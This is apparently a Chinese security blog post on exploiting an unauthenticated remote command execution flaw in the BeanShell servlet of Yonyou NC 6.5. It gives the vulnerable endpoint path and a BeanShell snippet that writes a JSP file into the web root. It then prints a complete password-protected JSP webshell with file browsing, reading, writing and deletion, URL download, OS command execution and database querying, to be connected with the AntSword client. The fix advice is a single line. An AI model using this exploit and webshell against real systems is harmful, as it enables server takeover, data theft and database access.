觅稀奇MeXiQi.COM

当前位置:
  1. 首页
  2. 代码安全
  3. 正文

用友 NC bsh.servlet.BshServlet RCE

访客 访客 2024-04-23 1360 0

用友NCbsh.servlet.BshServletRCE利用

1.漏洞介绍

用友NCbsh.servlet.BshServlet存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。

影响版本:用友NC6.5版本

在漏洞挖掘过程中碰到了这个漏洞于是记录一下如何利用

2.漏洞利用

1.网站首页

访问:servlet/~ic/bsh.servlet.BshServlet

使用exce进行远程命令执行

使用以下命令写入jsp一句话

importsun.misc.BASE64Decoder;BASE64Decoderdecoder=newBASE64Decoder();FileWriterfw=newFileWriter(newFile("./webapps/nc_web/123.jsp"));Stringdata="MTIz";Stringstr=newString(decoder.decodeBuffer(data),"utf-8");fw.write(str);fw.close();data为jsp一句话内容,base64加密

base64加密以下jsp马

<%@pageimport="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!StringPwd="pass";StringEC(Strings,Stringc)throwsException{returns;}//newString(s.getBytes("ISO-8859-1"),c);}ConnectionGC(Strings)throwsException{String[]x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();Connectionc=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}returnc;}voidAA(StringBuffersb)throwsException{Filer[]=File.listRoots();for(inti=0;i<r.length;i){sb.append(r[i].toString().substring(0,2));}}voidBB(Strings,StringBuffersb)throwsException{FileoF=newFile(s),l[]=oF.listFiles();StringsT,sQ,sF="";java.util.Datedt;SimpleDateFormatfm=newSimpleDateFormat("yyyy-MM-ddHH:mm:ss");for(inti=0;i<l.length;i){dt=newjava.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ=l[i].canWrite()?"W":"";if(l[i].isDirectory()){sb.append(l[i].getName()"/\t"sT"\t"l[i].length()"\t"sQ"\n");}else{sF=l[i].getName()"\t"sT"\t"l[i].length()"\t"sQ"\n";}}sb.append(sF);}voidEE(Strings)throwsException{Filef=newFile(s);if(f.isDirectory()){Filex[]=f.listFiles();for(intk=0;k<x.length;k){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}voidFF(Strings,HttpServletResponser)throwsException{intn;byte[]b=newbyte[512];r.reset();ServletOutputStreamos=r.getOutputStream();BufferedInputStreamis=newBufferedInputStream(newFileInputStream(s));os.write(("->""|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|""<-").getBytes(),0,3);os.close();is.close();}voidGG(Strings,Stringd)throwsException{Stringh="0123456789ABCDEF";intn;Filef=newFile(s);f.createNewFile();FileOutputStreamos=newFileOutputStream(f);for(inti=0;i<d.length();i=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i1))));}os.close();}voidHH(Strings,Stringd)throwsException{Filesf=newFile(s),df=newFile(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}Filez[]=sf.listFiles();for(intj=0;j<z.length;j){HH(s"/"z[j].getName(),d"/"z[j].getName());}}else{FileInputStreamis=newFileInputStream(sf);FileOutputStreamos=newFileOutputStream(df);intn;byte[]b=newbyte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}voidII(Strings,Stringd)throwsException{Filesf=newFile(s),df=newFile(d);sf.renameTo(df);}voidJJ(Strings)throwsException{Filef=newFile(s);f.mkdir();}voidKK(Strings,Stringt)throwsException{Filef=newFile(s);SimpleDateFormatfm=newSimpleDateFormat("yyyy-MM-ddHH:mm:ss");java.util.Datedt=fm.parse(t);f.setLastModified(dt.getTime());}voidLL(Strings,Stringd)throwsException{URLu=newURL(s);intn;FileOutputStreamos=newFileOutputStream(d);HttpURLConnectionh=(HttpURLConnection)u.openConnection();InputStreamis=h.getInputStream();byte[]b=newbyte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}voidMM(InputStreamis,StringBuffersb)throwsException{Stringl;BufferedReaderbr=newBufferedReader(newInputStreamReader(is));while((l=br.readLine())!=null){sb.append(l"\r\n");}}voidNN(Strings,StringBuffersb)throwsException{Connectionc=GC(s);ResultSetr=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)"\t");}r.close();c.close();}voidOO(Strings,StringBuffersb)throwsException{Connectionc=GC(s);String[]t={"TABLE"};ResultSetr=c.getMetaData().getTables(null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")"\t");}r.close();c.close();}voidPP(Strings,StringBuffersb)throwsException{String[]x=s.trim().split("\r\n");Connectionc=GC(s);Statementm=c.createStatement(1005,1007);ResultSetr=m.executeQuery("select*from"x[3]);ResultSetMetaDatad=r.getMetaData();for(inti=1;i<=d.getColumnCount();i){sb.append(d.getColumnName(i)"("d.getColumnTypeName(i)")\t");}r.close();m.close();c.close();}voidQQ(Stringcs,Strings,Stringq,StringBuffersb)throwsException{inti;Connectionc=GC(s);Statementm=c.createStatement(1005,1008);try{ResultSetr=m.executeQuery(q);ResultSetMetaDatad=r.getMetaData();intn=d.getColumnCount();for(i=1;i<=n;i){sb.append(d.getColumnName(i)"\t|\t");}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i){sb.append(EC(r.getString(i),cs)"\t|\t");}sb.append("\r\n");}r.close();}catch(Exceptione){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("ExecuteSuccessfully!\t|\t\r\n");}catch(Exceptionee){sb.append(ee.toString()"\t|\t\r\n");}}m.close();c.close();}%><%Stringcs=request.getParameter("z0")==null?"gbk":request.getParameter("z0")"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="cs);StringZ=EC(request.getParameter(Pwd)"",cs);Stringz1=EC(request.getParameter("z1")"",cs);Stringz2=EC(request.getParameter("z2")"",cs);StringBuffersb=newStringBuffer("");try{sb.append("->""|");if(Z.equals("A")){Strings=newFile(application.getRealPath(request.getRequestURI())).getParent();sb.append(s"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}elseif(Z.equals("B")){BB(z1,sb);}elseif(Z.equals("C")){Stringl="";BufferedReaderbr=newBufferedReader(newInputStreamReader(newFileInputStream(newFile(z1))));while((l=br.readLine())!=null){sb.append(l"\r\n");}br.close();}elseif(Z.equals("D")){BufferedWriterbw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(newFile(z1))));bw.write(z2);bw.close();sb.append("1");}elseif(Z.equals("E")){EE(z1);sb.append("1");}elseif(Z.equals("F")){FF(z1,response);}elseif(Z.equals("G")){GG(z1,z2);sb.append("1");}elseif(Z.equals("H")){HH(z1,z2);sb.append("1");}elseif(Z.equals("I")){II(z1,z2);sb.append("1");}elseif(Z.equals("J")){JJ(z1);sb.append("1");}elseif(Z.equals("K")){KK(z1,z2);sb.append("1");}elseif(Z.equals("L")){LL(z1,z2);sb.append("1");}elseif(Z.equals("M")){String[]c={z1.substring(2),z1.substring(0,2),z2};Processp=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}elseif(Z.equals("N")){NN(z1,sb);}elseif(Z.equals("O")){OO(z1,sb);}elseif(Z.equals("P")){PP(z1,sb);}elseif(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exceptione){sb.append("ERROR""://"e.toString());}sb.append("|""<-");out.print(sb.toString());%>

执行成功后

用蚁剑连接

3.漏洞修复

建议使用该产品的用户及时安装该漏洞补丁包

如无特别说明,本站所有文章均为原创。转载请注明出处,谢谢合作。

本文地址:https://www.mexiqi.com/135327.html

分享本文
微信扫一扫分享到朋友圈
上一篇
《网络安全0-100》VPN
下一篇
永恒:蓝ms17010漏洞

发表评论

  • 评论列表
还没有人评论,快来抢沙发吧~